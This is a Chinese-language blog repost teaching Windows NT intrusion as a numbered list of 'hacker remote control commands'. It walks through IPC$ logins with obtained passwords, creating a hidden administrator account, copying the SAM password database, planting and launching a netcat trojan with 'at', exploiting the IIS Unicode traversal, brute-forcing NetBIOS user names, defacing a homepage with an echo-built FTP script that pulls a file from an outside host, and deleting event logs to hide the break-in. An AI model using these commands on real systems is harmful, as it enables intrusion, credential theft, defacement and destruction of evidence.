黑客常用的遠端控制指令

以下是黑客常用的遠端控制指令,想學黑客,不記得這些,沒門.......

--------------------------------------------------------------------------------

1：NET 

隻要你擁有某IP的使用者名和密碼，那就用IPC$做連接配接吧！ 

這裡我們假如你得到的使用者是hbx，密碼是123456。假設對方IP為127.0.0.1 

net use \\127.0.0.1\ipc$ "123456" /user:"hbx" 

退出的指令是 

net use \\127.0.0.1\ipc$ /delte 

下面的操作你必須登陸後才可以用.登陸的方法就在上面. 

---------------------- 

下面我們講怎麼建立一個使用者，由于SA的權限相當于系統的超級使用者. 

我們加一個heibai的使用者密碼為lovechina 

net user heibai lovechina /add 

隻要顯示指令成功,那麼我們可以把他加入Administrator組了. 

net localgroup Administrators heibai /add 

這裡是講映射對方的C槽,當然其他盤也可以,隻要存在就行了.我們這裡把對方的C槽映射到本地的Z盤. 

net use z:\\127.0.0.1\c$ 

net start telnet 

這樣可以打開對方的TELNET服務. 

這裡是将Guest使用者激活，guest是NT的預設使用者，而且無法删除呢？不知道是否這樣，我的2000就是删除不了它。 

net user guest /active:yes 

這裡是把一個使用者的密碼改掉，我們把guest的密碼改為lovechina，其他使用者也可以的。隻要有權限就行了呀！ 

net user guest lovechina 

net指令果然強大啊！ 

2:at 

一般一個入侵者入侵後都會留下後門，也就是種木馬了，你把木馬傳了上去，怎麼啟動他呢？ 

那麼需要用AT指令，這裡假設你已經登陸了那個伺服器。 

你首先要得到對方的時間， 

net time \\127.0.0.1 

将會傳回一個時間，這裡假設時間為12:1,現在需要建立一個作業，其ID=1 

at \\127.0.0.1 12:3 nc.exe 嚴志梁 

這裡假設了一個木馬，名為NC.EXE,這個東西要在對方伺服器上. 

這裡介紹一下NC,NC是NETCAT的簡稱,為了友善輸入,一般會被改名.它是一個TELNET服務,端口為99. 

等到了12:3就可以連接配接到對方的99端口.這樣就給對方種下了木馬. 

3:telnet 

這個指令非常實用,它可以與遠方做連接配接，不過正常下需要密碼、使用者,不過你給對方種了木馬,直接連到這個木馬打開的端口. 

telnet 127.0.0.1 99 

這樣就可以連到對方的99端口.那你就可以在對方運作指令了,這個也就是殭屍電腦. 

4:FTP 

它可以将你的東西傳到對方機子上,你可以去申請個支援FTP上傳的空間,國内多的是,如果真的找不到,我給個[url]WWW.51.NET[/url],不錯的.當我們申請完後，它會給使用者名,密碼,以及FTP伺服器. 

在上傳前需要登陸先，這裡我們假設FTP伺服器是[url]WWW.51.NET[/url],使用者名是HUCJS,密碼是654321 

ftpwww.51.net 

他會要求輸入使用者,成功後會要求輸入密碼. 

下面先說上傳,假設你需上傳的檔案是INDEX.HTM,它位于C:\下,傳到對方D:\ 

get c:\index.htm d:\ 

假設你要把對方C槽下的INDEX.HTM,下到你的機子的D盤下 

put c:\index.htm d:\ 

5:copy 

下面我說說怎樣把本地的檔案複制到對方硬碟上去，需要建立好IPC$連接配接才有效。 

這裡我們把本地C槽下的index.htm複制到127.0.0.1的C槽下 

copy index.htm \\127.0.0.1\c$\index.htm 

如果你要複制到D盤下把C改為D，就行了！ 

copy index.htm \\127.0.0.1\d$\index.htm 

如果你要把他複制到WINNT目錄裡 

就要把輸入 

copy index.htm \\127.0.0.1\admin$\index.htm 

admin$是winnt 

要把對方的檔案複制過來，順便告訴大家NT的備份的資料庫放在x:\winnt\repair\sam._ sam._是資料庫的檔案名 

下面就把127.0.0.1的資料庫複制到本地C槽下 

copy \\127.0.0.1\admin$\repair\sam._ c:\ 

6：set 

如果你跑進了一部機子，而且想黑他（這思想隻能在特别時候才準有），當然他的80端口要開，不然你黑給誰看。這時需要用SET指令！ 

下面是我得到的結果！我來分析它，隻是找首頁在那而已。 

COMPUTERNAME=PENTIUMII 

ComSpec=D:\WINNT\system32\cmd.exe 

CONTENT_LENGTH=0 

GATEWAY_INTERFACE=CGI/1.1 

HTTP_ACCEPT=*/* 

HTTP_ACCEPT_LANGUAGE=zh-cn 

HTTP_CONNECTION=Keep-Alive 

HTTP_HOST=目前登陸者的IP，這裡本來是顯示我的IP，被我删除了 

HTTP_ACCEPT_ENCODING=gzip, deflate 

HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) 

NUMBER_OF_PROCESSORS=1 

Os2LibPath=D:\WINNT\system32\os2\dll; 

OS=Windows_NT 

Path=D:\WINNT\system32;D:\WINNT 

PATHEXT=.COM;.EXE;.BAT;.CMD 

PATH_TRANSLATED=E:\vlroot首頁放在的位址，隻要你看到PATH_TRANSLATED=的後面就是首頁的存放位址。這裡是E:\vlroot 

PROCESSOR_ARCHITECTURE=x86 

PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel 

PROCESSOR_LEVEL=6 

PROCESSOR_REVISION=0303 

PROMPT=$P$G 

QUERY_STRING=/c+set 

REMOTE_ADDR=XX.XX.XX.XX 

REMOTE_HOST=XX.XX.XX.XX 

REQUEST_METHOD=GET 

SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe 

SERVER_NAME=XX.XX.XX.XX 

SERVER_PORT=80 

SERVER_PORT_SECURE=0 

SERVER_PROTOCOL=HTTP/1.1 

SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0 

SystemDrive=D: 

SystemRoot=D:\WINNT 

TZ=GMT-9 

USERPROFILE=D:\WINNT\Profiles\Default User 

windir=D:\WINNT 

粉紅色的那行就是對方首頁存放位址，這裡告訴大家一個技巧，很笨的技巧啊，不過隻能用這個方法才能100%的找到首頁的名稱，當你DIR這個目錄時，一定會看到很多檔案，你可以把所有檔案在浏覽器這樣輸入XX.XX.XX.XX/檔案名，這樣隻要看到和XX.XX.XX.XX看到的也面一模一樣，那麼這就是首頁的名稱了。 

7：nbtstat 

如果你掃到一部NT的機子，他的136到139其中一個端口開了的話，就要用這個指令得到使用者了。順便告訴大家這是netbios，得到使用者名後就可以猜猜密碼了。例如比較簡單的密碼，密碼和使用者名一樣的，都試下，不行就暴力破解吧！ 

現在網上很多NT的機子都開了這些端口的，你可以練習下，我們來分析得到的結果。 

指令是 

nbtstat -A XX.XX.XX.XX 

-A一定要大寫哦。 

下面是得到的結果。 

NetBIOS Remote Machine Name Table 

Name Type Status 

--------------------------------------------- 

Registered Registered Registered Registered Registered Registered Registered Reg 

istered Registered Registered Registered 

MAC Address = 00-E0-29-14-35-BA 

PENTIUMII <00> UNIQUE 

PENTIUMII <20> UNIQUE 

ORAHOTOWN <00> GROUP 

ORAHOTOWN <1C> GROUP 

ORAHOTOWN <1B> UNIQUE 

PENTIUMII <03> UNIQUE 

INet~Services <1C> GROUP 

IS~PENTIUMII...<00> UNIQUE 

ORAHOTOWN <1E> GROUP 

ORAHOTOWN <1D> UNIQUE 

..__MSBROWSE__.<01> GROUP 

粉紅色的就是登陸過這部系統的使用者，可能你不知道怎麼看，大家是不是看到了一竄數字，隻要這竄數字是<03>的話，那他前面的就是使用者。 

這裡的使用者是PENTIUMII。 

8：Shutdown 

關了對方的NT伺服器的指令 

Shutdown \\IP位址 t:20 

20秒後将NT自動關閉，三思後才能運作這個指令，這樣對對方造很大的損失，要做個有良心的入侵者呀。 

9：DIR 

這個指令沒什麼好講，但是卻非常重要，他是檢視一目錄裡的所有檔案、檔案夾。 

你可以本地試下。 

10：echo 

著名的漏洞Unicode，這個指令可以簡單的黑一下有這個漏洞的主機。 

我們假設我們要把“南京大屠殺鐵證如山，任何日本人不得抵賴！”寫入index.htm，有2種方法，大家看看有什麼差別。 

echo 南京大屠殺鐵證如山，任何日本人不得抵賴！>index.htm 

echo 南京大屠殺鐵證如山，任何日本人不得抵賴！>>index.htm 

第一個的意思是覆寫index.htm原有的内容，把“南京大屠殺鐵證如山，任何日本人不得抵賴！”寫進index.htm。 

第二個的意思是把“南京大屠殺鐵證如山，任何日本人不得抵賴！”加到index.htm裡面。 

“>>”産生的内容将追加進檔案中，“>”則将原檔案内容覆寫。 

大家可以本地試下。 

可能你會問，這樣簡單黑下有什麼好玩的，其實他可以用來下載下傳首頁到對方的目錄裡。 

1、首先，我們需要申請一個免費的首頁空間。 

2、用echo在可寫目錄下建立如下内容的txt檔案：（以chinren伺服器為例。） 

open upload.chinaren.com（你的FTP伺服器，申請時你的空間提供商會給你的） 

cnhack（你申請時的使用者名） 

test（你申請時的密碼） 

get index.htm c:\inetpub\wwwroot\index.htm（這裡是把你空間上的index.htm下載下傳到對方的c:\inetpub\wwwroot\index.htm） 

bye（退出FTP對話，相當在98下的DOS，用EXIT退出DOS） 

具體的做法： 

輸入 echo open upload.chinaren.com> c:\cnhack.txt 

輸入 echo cnhack >> c:\cnhack.txt 

輸入 echo 39abs >> c:\cnhack.txt 

輸入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt 

最後輸入 ftp -s:c:\cnhack.txt （利用ftp的-s參數，執行檔案裡的内容。） 

等指令完成時，檔案已經下載下傳到你指定的檔案裡了。 

注意：取得檔案後，請删除cnhack.txt。（如果不删除，很容易會給别人看到你的密碼。） 

記得要 del c:\cnhack.txt 

11:attrib 

這個指令是設定檔案屬性的。如果你想黑一個站，而他的首頁的檔案屬性設定了隻讀，那就很可憐呀，想删除他也不行，想覆寫他也不行。倒！不過有這個指令就别怕了。 

attrib -r index.htm 

這個指令是把index.htm的隻讀屬性去掉。 

如果把“-”改為“+”則是把這個檔案的屬性設定為隻讀 

attrib +r index.htm 

這個指令是把index.htm的屬性設定為隻讀。 

12el 

當你看到這個标題可别倒下啊！現在要離開127.0.0.1了，要删除日志，當然要删除日志啦！想被捉嗎。呵呵。 

NT的日志有這些 

del C:\winnt\system32\logfiles\*.* 

del C:\winnt\ssytem32\config\*.evt 

del C:\winnt\system32\dtclog\*.* 

del C:\winnt\system32\*.log 

del C:\winnt\system32\*.txt 

del C:\winnt\*.txt 

del C:\winnt\*.log 

隻要删除這些就可以了。有些系統NT安裝在D盤或其他盤，就要把C改成其他盤。

本文轉自loveme2351CTO部落格，原文連結： http://blog.51cto.com/loveme23/8597，如需轉載請自行聯系原作者